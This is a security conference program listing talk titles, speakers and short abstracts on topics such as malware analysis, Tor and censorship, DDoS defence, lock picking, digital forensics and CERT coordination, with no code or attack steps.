

Applied Security Visualization
Raffael Marty - Loggly

Over the past years, security organizations have collected more and more data and log files within their networks and systems. Oftentimes, the data ends up being stored and archived without ever being used. This can be attributed to a lack of tools that help process and analyze all the data, but also to the lack of knowledge around data analysis. This workshop explores the world of data analysis and visualization. Using today's state-of-the-art data analysis and visualization techniques, we are going to look at how we can gain a far deeper understanding of what's happening in our networks. How can visualization techniques be applied to understand packet captures or network flows instead of just producing pretty pictures? We will explore how we can uncover hidden patterns of data, identify emerging vulnerabilities and attacks, and respond decisively with countermeasures that are far more likely to succeed than conventional methods. As part of the workshop we will also look at the insider threat problem and have a brief look at how host-centric (as opposed to network-centric) analysis can help complete the picture of an incident. The entire workshop is based on open source tools, such as AfterGlow or Treemap. The attendees will get an overview of log aggregation, log management, visualization, data sources for IT security, and learn how to generate visual representations of IT data. The workshop is accompanied by hands-on exercises utilizing the DAVIX live CD.

Cryptography is hard
Daniel Grzelak & Paul Theraault - stratsec

Even the most experienced mathematicians, cryptographers, and developers get it wrong. So what hope does the average web developer have? This half day workshop will provide practical no-nonsense advice for the web developer, no equations, no proofs, no fluffing about, just practical advice on how to solve real world problems with cryptography.

Capture the Flag
Tim Rosenberg - White Wolf Security

Welcome to White Wolf Security's Capture the Flag (CTF) event. Players register as individuals. (You may decide to form attack teams of up to 4 players on the day.) A list of targets (IP addresses) and flags/goals will be provided. Teams and individuals will be scored on their ability to compromise systems, edit and/or capture flags, and complete specific tasks (injects) within a certain amount of time. These injects could range from the technical to the policy; from offense to defense. Requirements: Players must bring their own laptop or hardware to attack from. NOTE: Do not bring a regular production laptop for this! You will be connecting to a live, hostile network. Players should assume that all data could be lost. Players assume all responsibility and risk by agreeing to play.

Professional Vulnerability Research and Analysis
Chris Spencer - iDefense

This presentation will take an inside look at how day to day vulnerability analysis and research is conducted within a typical Vulnerability Research Team. Some topics that will be covered include:
- Techniques and tools used to analyse Microsoft binary patches.
- Static and dynamic binary analysis and vulnerability code path identification.
- Proof-of-concept exploit development.
- Tools and techniques used for debugging vulnerability related crashes.
- Vulnerability discovery via binary analysis and source code analysis.
A whirlwind tour of the techniques that we use in our daily work will be presented in the form of demonstration. The demonstration will cover the steps involved in taking a Microsoft patch and turning it into a working remote kernel exploit. This presentation may be of interest to anyone currently working in the vulnerability research field, or those who are planning to follow a career in this field.

Tor and censorship: lessons learned
Roger Dingledine - The Tor Project

Tor is a free-software anonymizing network that helps people around the world use the Internet in safety. Tor's 1600 volunteer relays carry traffic for several hundred thousand users including ordinary citizens who want protection from identity theft and prying corporations, corporations who want to look at a competitor's website in private, and soldiers and aid workers in the Middle East who need to contact their home servers without fear of physical harm. Tor was originally designed as a civil liberties tool for people in the West. But if governments can block connections *to* the Tor network, who cares that it provides great anonymity? A few years ago we started adapting Tor to be more robust in countries like China. We streamlined its network communications to look more like ordinary SSL, and we introduced 'bridge relays' that are harder for an attacker to find and block than Tor's public relays. In the aftermath of the Iranian elections in June, and then the late September blockings in China, we've learned a lot about how circumvention tools work in reality for activists in tough situations. I'll give an overview of the Tor architecture, and summarize the variety of people who use it and what security it provides. Then we'll focus on the use of tools like Tor in countries like Iran and China: why anonymity is important for circumvention, why transparency in design and operation is critical for trust, the role of popular media in helping -- and harming -- the effectiveness of the tools, and tradeoffs between usability and security. After describing Tor's strategy for secure circumvention (what we *thought* would work), I'll talk about how the arms race actually seems to be going in practice.

BlackEnergy 2 Revealed
Joe Stewart - SecureWorks

BlackEnergy is a popular DDoS trojan written by "Cr4sh", a member of the Russian hacking group "Hell Knights". Recently a major new version of the trojan in extremely limited circulation was identified in the wild by the presenter of this talk. This new rewrite of the trojan expands BlackEnergy's capabilities from a simple DDoS trojan to a stealthy modular platform for DDoS, spam and banking fraud. This talk is an in-depth look at the low-level functionality of the BlackEnergy 2 trojan. After listening to this talk, attendees should be able to:
- Contrast the differences between BlackEnergy versions 1 and 2
- Detail the encryption and compression algorithms used in version 2
- Understand the rootkit/process-injection method used in version 2
- Enumerate the core functions of the main BlackEnergy 2 module
- Understand the basics of the BlackEnergy 2 plugin API
- Describe the functionality of all known BlackEnergy 2 plugins

The Torpig Trojan: Lessons Learned From Five Years In The Trenches
Jason Milletary - SecureWorks

2010 will mark the 5th year of operation of a mysterious group of criminals overseeing a vast international network of online identity theft crime. The primary tool they use is a piece of malware commonly referred to as Torpig, Sinowal, Anserin, or Mebroot. In this group, we have seen cutting-edge technical advances in malware and unending savvy in the ability to hide their identities. In this presentation, we will explore the timeline of this group from the perspective of a single humble analyst. It is the hope that by understanding the actions of this group, we can identify lessons learned from a technical and legal standpoint and utilize them moving forward. Does this story have a happy ending? We will have to wait and see. This presentation is intended for all people interested in learning more about cybercrime and lessons on how we can improve the fight from the point of view of the speaker. In this presentation we will cover:
- Details of a highly organized cyber criminal group
- The initial analysis and mitigation efforts to counter this group
- The technical advancements and increasing sophistication of the criminal organizations supporting this group
- Challenges for law enforcement and targeted organizations in pursuing legal action
- Insights learned at key points during the past 5 years
- Thoughts on applying lessons learned to this group or future cybercrime groups

Pulling the Plug: Security Risks in the Next Generation of Offline Web Applications
Michael Sutton - ZSCALER

As the line between desktop and web applications becomes increasingly blurry in a web 2.0 world, browser functionality is being pushed well beyond what it was originally intended for. Persistent client side storage has become a requirement for web applications if they are to be available both online and off. This need is being filled by a variety of technologies such as Gears (formerly Google Gears) and the Database Storage functionality included in the emerging HTML 5 specification. While all such technologies offer great promise, it is clear that the vast majority of developers simply do not understand their security implications. Researching a variety of currently deployed implementations of these technologies has revealed a broad scope of vulnerabilities with frightening implications. Now attackers can target victims not just once, but every time they visit a site, as the victim now carries and stores the attack with them. Imagine a scenario whereby updated confidential information is forwarded to an attacker every time a victim interacts with a given web application. The attacker no longer needs to worry about timing their attacks to ensure that the victim is authenticated, as the victim attacks himself! Limited storage? Cookies that expire? Not a problem when entire databases are accessible with virtually unlimited storage and an infinite lifespan. Think these attacks are theoretical? Think again. In this talk we dive into these technologies and break down the risk posed by them when not properly understood. We will then detail a variety of real-world vulnerabilities that have been uncovered, including a new class of cross-site scripting and client-side SQL injection.

Suricata and the Open Information Security Foundation (OISF)
Matt Jonkman - The Open Information Security Foundation

The Suricata Engine is an Open Source Next Generation Intrusion Detection and Prevention Engine. This engine is not intended to just replace or emulate the existing tools in the industry, but will bring new ideas and technologies to the field. The Open Information Security Foundation (OISF) is a non-profit foundation organized to build a next generation IDS/IPS engine. The OISF has formed a multi-national group of the leading software developers in the security industry. In addition to developers and a consortium consisting of leading cyber security companies, OISF has engaged the open source security community to identify current and future IDS/IPS needs and desires. OISF's primary goal is to remain on the leading edge of open source IDS/IPS development, community needs and objectives. This is only attainable if you, the community, get involved. We welcome participation large and small and have built working groups and mailing lists to engage and educate all interested people and organizations. Funding for the OISF comes from the US Department of Homeland Security (DHS) and a number of private companies that form the OISF Consortium. These companies gain a non-GPL limited license for the engine in return for their ongoing support. Over time, OISF will take on new projects and challenges.

The Role and Function of Social Networks in the Russian Malware Community
Max Kilger - The HoneyNet Project

A great deal of research has focused on the malicious software and attack tools generated by Russian hacker groups to engage in attacks against economic systems, government, and civilian targets. Technical explorations of malware provide insight into defensive postures to reduce these threats, though there is still a great deal that is unknown about the social dynamics of hacking in this part of the world. This presentation will attempt to expand our understanding of the peer networks, demographic composition, and skills of the members of eight groups from the Eastern European and Russian hacker community using open source data. The findings give significant insight into the education, physical locations, and social relationships between hackers and malware writers. The social networks that undergird this community will also be explored in depth, including the proximity and distribution of skilled and unskilled hackers. This presentation will benefit law enforcement, security professionals, and the intelligence community by shedding light on the social world of the Russian hacker community.

Training Your Pigs to Dance on a Shoestring - How to Run a Security Awareness Programme
Richard Beach - Inland Revenue - NZ Government

The presentation is split into three parts:
1. A short amount of time will be spent discussing the importance of breaking down the daunting task of 'educating users' into the three streams of awareness, training and education. A plan for an ongoing series of awareness campaigns will then be shared, explaining how such a plan can be customised for any organisation.
2. An exposé of awareness materials created by the Inland Revenue Information Security team. The presenter will share posters, web pages, podcasts, surveys, fact sheets, competitions and interactive activities covering a range of topics including information classification, malware, passwords, portable storage and more. As the various resources are shared, the presenter will describe how they were produced using largely open source and/or free materials. This section will be littered with humorous anecdotes.
3. The third part will cover some of the important lessons learned along the way, including the importance of making the programme relevant to your organisation's culture, the value of building and maintaining relationships, the need to have a sound policy base, why you shouldn't take yourself too seriously, and remembering that the key is to make it easy for employees to comply.
Intended Audience: Anyone with responsibility for planning and/or implementing a security awareness programme, or anyone considering doing so.
Objectives: Participants will:
- Leave with a bundle of tips and templates for creating engaging and interactive awareness activities in-house.
- Take away lessons learned from experience, such as the importance of sticking to corporate identity guidelines, and the value of offending just the right number of people.
- Take a first step towards planning an awareness campaign for their own organisations.
Assumptions: The presentation is not designed to argue the case for an awareness programme. It is assumed that participants already consider awareness a crucial component of any security programme.

Lock Picking - class instance 1
Deviant Ollam - deviating.net

Physical security is an oft-overlooked component of data and system security in the technology world. While frequently forgotten, it is no less critical than timely patches, appropriate password policies, and proper user permissions. You can have the most hardened servers and network but that doesn't make the slightest difference if someone can gain direct access to a keyboard or, worse yet, march your hardware right out the door. Those who attend this session will leave with a full awareness of how to best protect buildings and grounds from unauthorized access. Attendees will not only learn how to distinguish good locks and access control from poor ones, but will also become well-versed in picking and bypassing many of the most popular locks used in the business world today... convince management that a new investment is necessary by showing them yourself how the server room door can be opened without a key in under a minute!

Lock Picking - class instance 2
Deviant Ollam - deviating.net

Repeat of this morning's class. Physical security is an oft-overlooked component of data and system security in the technology world. While frequently forgotten, it is no less critical than timely patches, appropriate password policies, and proper user permissions. You can have the most hardened servers and network but that doesn't make the slightest difference if someone can gain direct access to a keyboard or, worse yet, march your hardware right out the door. Those who attend this session will leave with a full awareness of how to best protect buildings and grounds from unauthorized access. Attendees will not only learn how to distinguish good locks and access control from poor ones, but will also become well-versed in picking and bypassing many of the most popular locks used in the business world today... convince management that a new investment is necessary by showing them yourself how the server room door can be opened without a key in under a minute!

An Historical Look at Cloud Computing
Whitfield Diffie

The history of information security is one of repeated confrontations resources too valuable to be ignored which bypass our conventional from radio through shared computing and networking to cloud computing and speculate on what form the solution of this latest challenge will take.

Scenes from the 2010 US/China cyberwar
Marcus J. Ranum - Tenable Network Security, Inc.

After watching the great US/China cyberwar of 2010, I was left puzzled, confused, and probably - as a taxpayer - quite a bit poorer. I'd like to take the opportunity to share my confusion with you.

Using Vulnerability Management to Thwart Data Loss
Bob Maley - Strategic CISO

Four years ago, the state of Pennsylvania had almost no capability for finding or reporting security vulnerabilities in its software applications, including the many public-facing Web sites through which the state gathers and distributes information to its constituents. However, after several noteworthy attacks and data breaches in its IT systems, including SQL injection campaigns emanating out of China, the state was forced to report a total of 500,000 stolen citizen and employee records during 2007. As the number of these attacks increased, the state's Office of Administration, Office for Information Technology (OA/OIT) realized that there was a need to change its overall security strategy from a network-centric model to a holistic model which included application security. This process was dubbed the Commonwealth Application Certification and Accreditation (CA)2 Process. Today, enforced as a certified mandate affecting all state agencies in Pennsylvania, the (CA)2 set of policies requires all affected organizations to complete a risk assessment process which includes questionnaires, source code scans, host based intrusion scans, and vulnerability assessments before applications are allowed to move into production. These questionnaires, scans, and assessments not only force an established level of application security to be embraced by individual agencies, but also help to benchmark the risk that applications pose to the state's broader IT infrastructure. To date the (CA)2 process has identified critical vulnerabilities that, if not corrected, could have been exploited by SQL or XSS attacks which could have led to identity thefts and the propagation of malicious code. By closing vulnerabilities before they were exploited, the Commonwealth has prevented data leakage, identity theft and theft of services, and saved millions of dollars that would have been spent on related response efforts.
To note, Pennsylvania dropped its total volume of exposed records to just over 200 records during 2008. In 2009, the state had only a handful of sensitive records compromised, as a direct result of the program. In this talk, former Pennsylvania CISO Bob Maley, the originator and architect of the (CA)2 process, will touch upon everything from the problems that the requirements seek to address to the unique challenge of creating a new security standard, evolving it over time and evangelizing the process to affected constituents.

Security FAIL: We're doing it wrong.
Scott McIntyre - XS4ALL

Working as the Chief Security Officer at an ISP and member of a national telco's CERT for the better part of a decade, as well as serving on the Board of Directors for the globally focussed Forum of Incident Response and Security Teams, brings with it many adventures, challenges, laughs, tears, and hair loss to someone who can't afford it. Reflections on how we as an IT security community are handling recent threats, the role of 'disclosure', governance, FUD and the ever present (and increasing) threat of government over-regulation stifling innovation are just some of the topics which will be covered during this likely controversial talk. We all suffer the fallout from IT security failures, including those caused by CSIRT teams and incident handlers. Understanding the far-reaching consequences of our actions is critical if we're ever going to have a safer Internet experience for the masses.

DDoS Self Defence
Joe Stewart - SecureWorks

DDoS attacks allow someone to leverage a large number of computers against a target whose typical means of response is to shut down the affected services/systems or spend inordinate amounts of money and time working with ISPs and/or anti-DDoS vendors to quell the attack. Sometimes, however, it is possible to diminish the effects on the target by leveraging properties of the protocols used in the attack to the advantage of the victim. This talk will detail one such method which is effective against many HTTP-based DDoS attacks, along with a guide to DDoS tools, DDoS bots and controllers, and how to identify and track them. This talk is designed to convey specific information about DDoS tools and how to combat certain types of DDoS attacks. After listening to this talk, attendees should be able to:
- Enumerate the different types of DDoS tools in use today
- Categorize an attack by examining request traffic
- Fingerprint specific tools/trojans involved in an HTTP-based attack
- Exploit some basic bugs in a few DDoS trojan web interfaces
- Protect a network from most HTTP-based DDoS attacks

Stranger in a Strange Land: Reflections of a Linux Guy in Microsoft Windows
Crispin Cowan - Microsoft

Dr. Crispin Cowan, famous Linux security guy and vocal Microsoft critic, now works at Microsoft. What? Has Hell opened a ski resort? This talk will reflect on my experience at Microsoft as a Linux guy. Hell has not frozen over, and I'm having a great time. I will talk about how the Linux and Windows communities are more similar to each other than either community cares to admit, for good and bad, as well as highlighting the differences that I have found. I will also highlight the similarities and differences in the security problems faced by Windows and Linux, and how they deal with them.

Mobile Security
Ben Bromhead & Ken Hendrie - stratsec

With the widespread expansion of mobile phone functionality and the increasing demand to incorporate mobile devices as part of an executive's business toolkit, there is, like never before, an overwhelming need to address security, as the proliferation of these devices and their applications continues to go through the roof. The presentation will outline the threats and risks associated with mobile device deployment in an enterprise environment, as well as the controls used to counter these risks. Through the use of case studies and practical demonstrations, we will show that these risks are real and easily accessible. On top of this we will showcase innovative solutions that are evolving to meet these risks. The audience will only require a basic knowledge of security concepts and the presentation is designed to be easily followed by all.

Telco Security - from the inside
Mike Seddon - Telecom New Zealand

We are now surrounded by multiple security frameworks, compliance obligations, regulatory requirements, and a growing number of security vendors pitching their increasingly complex solutions. Each and every one of these is presented as the answer, sometimes the answer to all our problems. Unfortunately, all too often we get blinded by the hype and seem to be forgetting about our people. They are the ones who will make sense of all the flashing lights and sirens from those expensive 'silver bullet' tools you spend your security budget on. They are the ones who will develop the new processes and procedures needed to meet all your compliance obligations. They are the ones who will step in to save the day when the walls appear to be tumbling down around you. I'll be talking about our people along with some of the security related projects they've been working on. I'll also give you an inside view of some expected and unexpected benefits of giving the security folks time to develop their own tools and processes. After all, they know what's needed.

A Framework to understand and handle Internet Abuse Incidents
Juhani Eronen - CERT Finland

Today Internet Abuse comes in many forms, e.g. spam, malware infections, identity theft, targeted attacks, distributed denial of service (DDoS) attacks and other cybercrime activities. Sources and forms of the badness vary, but from the perspective of cyber citizens and organizations one question needs timely answers: are my systems victims or sources of these attacks?
Principal activity: We have been experimenting with a framework aimed to answer whether your IP addresses, netblocks or address spaces are part of it.
Methodology: In this framework we have documented the available feeds of information, use cases, processes, workflows, architectures, terminology, and the context of abuse fighting. We have attempted to provide some process building blocks and supporting software, such as the AbuseHelper toolkit to automate part of the work, which is a modular, scalable and robust software to help you in your Internet abuse handling process. This documentation and development has been done in open source fashion.
Results: The framework captures several generations of approaches to handling abuse by CSIRT teams, namely CERT-FI and CERT-EE, for their constituencies.
Conclusions: In this presentation we reach out to you and, by explaining what has been done, we probe you for feedback on what would be useful from your perspective. We feel that abuse reports are a valuable information feed about the actualised risks regarding network hosts and services. The integration of abuse data with network monitoring and audit findings could serve to provide much-needed information for the management of infrastructure risks. We are interested in your views about expanding the use cases beyond classic CSIRT activity towards governmental and commercial organizations participating more directly in the abuse handling process itself.

Connecting PM to routers
Hillar Aarelaid - CERT Estonia

This presentation demonstrates a novel approach to managing a state CIIP infrastructure. Development of a specialized information system (IS) is underway which is capable of interfacing itself with existing public and private systems to obtain status information for various strategic services. Another layer of the system will present interdependencies between strategic partners and will create an awareness-view for national leaders. Last, but not least, the system will create a semi-automatic basis to produce reports to national leaders. Efforts are being made to create communications and to represent metrics in a way which will not reveal business secrets between competitive players. The whole approach is heavily dependent on, and legally assured by, the Estonian (very modern) Emergency Situation Act, approved in June 2009 (English translation is available on request). Deployment of the system will include IS-assisted preparedness training. Audiences from fields such as national security, CIIP and SCADA will learn how to build a real-time nationwide situational awareness system.

Amazon EC2 security
Simone Brunozzi - Amazon.com

Simone Brunozzi, Amazon Web Services (AWS) Technology Evangelist for APAC, will briefly introduce the Amazon Web Services platform, and then dig into security details for Amazon EC2, covering the aspects that can be publicly discussed: physical and network security; instance isolation at the hypervisor level; common network attacks and how the EC2 team prevents or blocks them; and so forth. The session will end with a brief Q&A.

Titan Rain, the inside story of Shawn Carpenter
Richard Stiennon - IT Harvest

While most of the countries of the world seek peaceful co-existence, some have engaged in economic battles that entail state sponsorship of local industries at the expense of competitive forces. In 2004 and 2005 Shawn Carpenter, a security administrator at Sandia National Labs in New Mexico, discovered activity he traced back to China that indicated cyber espionage activity targeting US government, research, and military resources. Attendees will learn the methodologies the Chinese used to steal critical data on the Mars Lander and military data from US research labs. They will also learn the techniques Shawn employed to back track the hackers and use their own tools against them. Shawn Carpenter was 34 when he began his investigation into suspicious activity on the network of Sandia Labs in Albuquerque, New Mexico. He had risen through the ranks from nuclear mechanical systems maintenance to IT Security administrator. When he became responsible for monitoring Sandia's IDS systems he quickly became aware that all was not well. There were intrusions into Sandia's networks as well as other connected agencies and research labs. Shawn called on contacts within the US Military to guide him through his investigations after being told to drop his activity by his employer. From his home lab Shawn counter attacked the hackers that were abusing Sandia's network. He managed to gain control of their servers and capture copies of exfiltrated data. This presentation describes in detail Shawn's experience as he became a Confidential Informant of the FBI and was eventually dismissed from Sandia, a dismissal that led to a successful civil suit against Sandia. While press reports at the time of these events indicated the seriousness of the attacks against US research labs, they did not delve into the technical details. Those details came out in the lawsuit and are the primary source of material for this presentation.

A history of Microsoft exploit mitigations
Benjamin Mosse - stratsec

The theory behind memory corruption vulnerabilities has been known and understood since the early seventies; however, arguably the first article that clearly provided practical steps to exploit memory corruption was published by the Internet magazine Phrack in 1996. The now infamous article "Smashing the Stack for Fun and Profit" paved the way for mostly-underground researchers to make this class of vulnerability the most widespread and dangerous in the field of computer security. Prior to 2003 (with the release of Windows Server 2003 and then Windows XP Service Pack 2), no Microsoft based operating system implemented any kind of mitigation against memory corruption vulnerabilities. The proposed presentation will provide an overview of the history of the exploitation protection Microsoft has built, as it has developed since 2003. It will also discuss how the built-in protection has influenced the direction vulnerability researchers have followed as they were forced to find alternative methods of exploitation (for example the move towards client-side attacks). The speaker will also explain, in parallel, the techniques discovered by hackers and security researchers for bypassing security improvements Microsoft has implemented. The presentation will conclude with the speaker providing a summation of what future directions the Microsoft platform may take based on current exploitation mitigation solutions, and the evolution of the Windows operating system with the newly released Windows 7.

| The Rules of the Internet, and the Browsers That Break Them |
| |
|
Daniel Grzelak & Paul Theraault
- stratsec
|
| |
|
The Web, as a software platform, is a complex mess of binary: operating systems, browsers, plug-ins and extensions wrapped up in a standard and neat little bow, to achieve a passable level of interoperability. In order to be secure, all of these components must enforce the same security model and principles – but security controls vary between browsers, between plug-ins and even between different versions of the same software, making security decisions extremely difficult. By comparing and cataloguing the different browser and plug-in behaviours, this presentation aims to simplify the web for developers, sysadmins and everyday Internet users, to allow people to make more informed decisions about web application security. |
| |
|
| Digital Forensics Accreditation |
| |
|
Aaron Wooten
- StratSec
|
| |
|
As the concept of computer forensics has started to evolve into mainstream security consulting, so too has the emergence of related standards and best-practice guidelines. Each sets its own expectation as to how forensics should be performed, and the results that should be attained. However, in the end any computer forensics professional would say that what is important is that any computer forensics task is repeatable, reproducible and presentable in a court of law if required. So what computer forensics standards are available, which are relevant, and which provide us with the best assurance in the outcomes of a computer forensics investigation? This presentation provides the audience with an understanding of current and emerging computer forensics standards and best practices, and also highlights the pros and cons of each. |
| |
|
| AFP High Tech Crime year in review |
| |
|
Alex Tilley and Col Dix
- Australian Federal Police
|
| |
|
The Australian Federal Police's High Tech Crime Operations and Investigations areas deal with an increasingly wide variety of cases and incidents each year. In this presentation two experienced ‘boots on the ground’ staff members will run you through a few of the more interesting cases and incidents, with an eye to providing the audience with an insight into the types of work the AFP are tasked to undertake each day. |
| |
|
| Setting the scene in vulnerability work |
| |
|
Juhani Eronen
- CERT Finland
|
| |
|
Software faults and vulnerabilities are complex issues that involve actors with various goals as well as a multitude of soft and hard dependencies. With the advent of prevalent use of information technology, vulnerabilities have come to involve most of society. Principal activity: The purpose of this presentation is to present a brief summary of the current vulnerability landscape. Methodology: The presentation draws on the experience of ten years of vulnerability discovery and coordination. Results: The most important aspect to realise about vulnerability work is that it is a problem of resource limitations. Researchers try to maximise their productivity in terms of vulnerability sophistication, volume and impact, all considered hard research problems. Coordinators and reporters try to relay this information to the vendor in a clear and concise manner, while avoiding false positives, hype and needless pressure. Developers and vendors have goals ranging from protecting their customers to making revenue. Conclusions: The industry is currently mostly failing to produce dependable, secure and safe code. The current state of the art in vulnerability work highlights the need for developing methods for coping with vulnerability. |
| |
|
| Understanding scam victims: seven principles for systems security |
| |
|
Frank Stajano
- University of Cambridge, UK
|
| |
|
The success of many attacks on computer systems can be traced back to security engineers not understanding the psychology of the system users they were meant to protect. We examine a variety of scams and short cons that were investigated, documented and recreated for the BBC TV programme The Real Hustle, and we extract from them some general principles about the recurring behavioural patterns of victims that hustlers have learnt to exploit. We argue that an understanding of these inherent human-factors vulnerabilities, and the necessity to take them into account during design rather than naïvely shifting the blame onto the gullible users, is a fundamental paradigm shift for the security engineer which, if adopted, will lead to stronger and more resilient systems security. http://www.cl.cam.ac.uk/techreports/UCAM-CL-TR-754.pdf |
| |
|
| Integrating Information Security Policies within the Corporate Risk and Business Continuity Management Framework |
| |
|
Maria Corpuz
- Department of Education and Training (Queensland)
|
| |
|
Organizations implement corporate risk and business continuity management practices in accordance with their corporate governance policy structure. To cope with the escalating number of information security incidents, information security management has become a major element of corporate governance. This presentation provides a simple 3-step approach composed of auditing, developing, and implementing security policies as control measures within the corporate risk and business continuity management framework. Practical case examples of the successful implementation of the 3-step approach in corporate incident management are also presented as take-away lessons that can easily be adopted by any type of organisation. The presentation consists of three parts: Part 1 - Introduction, Part 2 - The 3-step Security Policy Framework, and Part 3 - Case Examples. The Introduction first provides global statistics on the state of security policy development and implementation. This is followed by an overview of information security policies and their relevance in implementing corporate risk and business continuity management. Part 2 presents the 3-step approach, which consists of the audit phase, the development phase, and the implementation phase. The framework is presented as a cyclical process within the corporate risk and business continuity management framework. Part 3 presents 4 practical case examples of the successful implementation of the 3-step approach as take-away lessons that can easily be adopted by any type of organisation. As a summary, a checklist of the security policies that can easily be implemented is provided. |
| |
|
| Cyber Intrusion: A Government Case Study |
| |
|
Technical Investigations, Cyber Security Operations Centre
- Defence Signals Directorate
|
| |
|
How do you stop an attacker exploiting a vulnerability no-one knows about, in a system you didn't know you had, and stealing data you thought no one cared about? Drive-by downloads and email-borne viruses are everyday hazards for every organisation with an internet connection, but what happens when a knowledgeable, determined attacker comes after not 'a network' but YOUR network? This presentation explores an intrusion onto the network of a contemporary organisation. We'll examine the techniques employed by the intruders, how this intrusion was detected and what would have stopped it happening in the first place. |
| |
|
| US Secret Service: Cell Phone and Embedded Technology Forensics |
| |
|
Andy Kearns
: Special Agent - United States Secret Service
|
| |
|
A look at the current and future capabilities of cell phone forensics as conducted by the United States Secret Service. Not only does the US Secret Service operate a state-of-the-art forensic facility, it also trains students, through a partnership with Tulsa University, to be on the cutting edge of embedded technology forensics for government and intelligence services. From laboratory chip-off analysis to field extraction of embedded data, the US Secret Service is able to provide complete forensic analysis services to its own agents as well as state, local, and even global law enforcement partners. |
| |
|
| Black Hat, White Hat, Gray Hat, RedHat: What Dr. Seuss Forgot to Tell You About the Computer Hacker Community 2.0 |
| |
|
Max Kilger
- The HoneyNet Project
|
| |
|
At the very first AusCERT conference in 2002, the original version of this talk outlined some of the motivations of malicious actors and entities on the Internet. It is now eight (what seem like very long) years later, and there have been incredible shifts in the threat matrix. There have also been significant shifts in the motivational matrix. In this presentation we will look at some new data that compares motivational distributions then and now. In addition, we will use these motivational shifts to identify potential emerging future threats that are likely to appear on the event horizon soon. |
| |
|
| Liability in Cyberspace - Time for a Re-think? |
| |
|
Arun Raghu
- stratsec
|
| |
|
This presentation explores a fundamental question for which no definitive answer yet exists: who should be held liable for criminal or otherwise unlawful conduct in cyberspace? The presentation is targeted toward any professionals with an interest in the crossover between security and legal issues in cyberspace. Traditional approaches to apportioning liability in cyberspace are typically focussed on holding the perpetrators of wrongful conduct responsible. While this is at first glance quite logical, the inexorable growth of cybercrime and of financial losses sustained online has highlighted somewhat of a failure in the effectiveness of current cybercrime laws. This means that alternative models for apportioning liability need to be evaluated. The presentation considers those alternatives, as well as additional issues their implementation might create. This is done in the context of examining several discrete areas which highlight the current ambiguity that exists with regard to liability in cyberspace. As cyberspace continues to become a crucial driver of the global economy, the need to more clearly define where responsibility for online misconduct should lie has increased dramatically. While this presentation does not intend to provide definitive answers in response to this need, it provides the intended audience with an indication of the key issues that have arisen in this area through references to salient cases and examples. In so doing, it is designed to encourage further thought and awareness of the importance of addressing the difficulties present in this area. |
| |
|
| Stay safe with your head in the clouds |
| |
|
Paul Gampe
: Vice President of Engineering Services and Operations at Red Hat
|
| |
|
Don't let security concerns prevent you from adopting the latest innovation in IT infrastructure - Cloud Computing. Learn how the skills you have acquired to secure applications are forming the foundation of 'sVirt'. Using libvirt in your Linux installation allows you to control the isolation of virtual machines through mandatory access control. This presentation will use specific operating system security mechanisms such as 'SELinux' to illustrate the value of this approach. |
| |
|
| Cyber Exercises: Training and Skills Identification |
| |
|
Tim Rosenberg
- White Wolf Security
|
| |
|
As cyber exercises move into the mainstream, there are several considerations about their use to identify and validate people, processes and technology. This talk will focus on the various types of exercises and how they fit into an educational and professional framework. The talk will also compare and contrast several exercise models and the pros and cons of building your own. |
| |
|
| A Perspective from the UK. The counter-fraud activities of 'Action Fraud' and 'National Lead Force' |
| |
|
Peter Ratcliffe
: Detective Chief Inspector - National Fraud Authority - UK
|
| |
|
This presentation will highlight the significant developments that have taken place in the past 3 years in the UK regarding the countering of fraud. I will pay particular attention to Action Fraud (the national reporting centre for fraud), the National Fraud Intelligence Bureau (which collates and analyses fraud intelligence from a wide range of sources across the UK) and the National Lead Force (a police unit based in the City of London, which has a national role for investigating major fraud). These are major changes in the fight against fraud, brought about after a review of fraud and its effects by the Attorney-General, and mark a change in how fraud is viewed by government, law enforcement and the private sector alike within the UK. |
| |
|
| Engagement between National / Government CERTs and the vendor community; benefits and challenges |
| |
|
Karl Hanmore & Steve Adegbite
- Microsoft
|
| |
|
This presentation examines the complex interactions between the National/Government CERT communities and software vendors. This talk looks to examine some of the underpinning challenges in ensuring a mutually beneficial relationship between these disparate organization types, with a view to highlighting the potential benefits and mechanisms for a way forward. This presentation will use some examples relating to Microsoft’s engagement with this community; however, it will primarily look at the broad ecosystem issues rather than focusing on Microsoft as a case study. It is hoped that the audience will gain a perspective on the potential issues and benefits underpinning these relationships, both from the perspective of the CERT as well as from the vendor perspective. The presentation aims to highlight these issues with a view to influencing the broad security ecosystem and the state of interaction between National/Government CERTs and the broader vendor community. Additionally, a new program by Microsoft specifically targeting this community will be highlighted as an example of how vendors can work more closely with the Government CERT community to the benefit of the broader ecosystem. The presentation will be given in two parts, with the initial material and generic ecosystem issues presented by Karl Hanmore, Senior Security Strategist, MSRC, and the new program details presented by Steve Adegbite, Senior Security Program Manager Lead. |
| |
|
| The Four Types of Lock |
| |
|
Deviant Ollam
- deviating.net
|
| |
|
Physical security is an oft-overlooked component of data and system security in the technology world. You can have the most hardened servers and networks but that doesn't make the slightest difference if someone can gain direct access to a console keyboard or, worse yet, march your hardware right out the door. While numerous ratings and standards exist in order to classify specific security hardware, many of these standards are ill-defined and poorly understood. Do you know what makes a ‘hardened’ or ‘contractor grade’ lock special? What does the phrase ‘high security’ signify on hardware packaging? As it turns out, many of these terms are just for show... but Deviant will walk you step-by-step through some distinct and easy-to-follow examples of how low-grade locks can fail as well as how to clearly identify quality equipment. Additionally, we will cover the more difficult matter of hardware purchase decisions at the highest levels... fine distinctions such as which locks belong on the CEO's office versus which ones to use on your server rooms. Every situation calls for something a bit different, and those differences add up when you're spending $100 or more per lock. Make your money count and keep your budget, and your data, secure.
Outline:
- Introduction
- Weaknesses of Basic Locks: Picking and Raking; Shimming; Bump Keying
- One Step Up - Pick Resistant and Commercial Locks: Advanced Keyways; Un-Shimmable Padlocks; Pick Resistant Pins; Basic Bump Resistance
- The Next Step - High Security Locks: Side Pins; Side Bars; Rotating Disks
- The Highest Grade - Unpickable Locks: Abloy Protec Rotating Disk; Magnetic Locks (Evva MCS)
- Discussion of Safes: Destructive Entry vs. Non-Destructive
- The Four Types of Lock: Basic; Resistant; High Security; Unpickable; Where they are appropriate
- A Word About Forensics (if there's time): Which Locks are Which; Direct Examples of these higher grades of lock |
| |
|
| Windows volatile memory forensics for incident response |
| |
|
Michael Cohen & Bradley Schatz
- Australian Federal Police and Schatz Forensic
|
| |
|
This full day tutorial will teach forensic acquisition and analysis techniques with a focus on investigating and identifying potential malware or intrusions involving the Windows OS. The course is aimed at a technical audience, such as incident responders and forensic examiners, who are interested in learning the latest in volatile memory acquisition and analysis. Participants should be familiar with the Microsoft Windows platform, and have some familiarity with operating system principles. |
| |
|
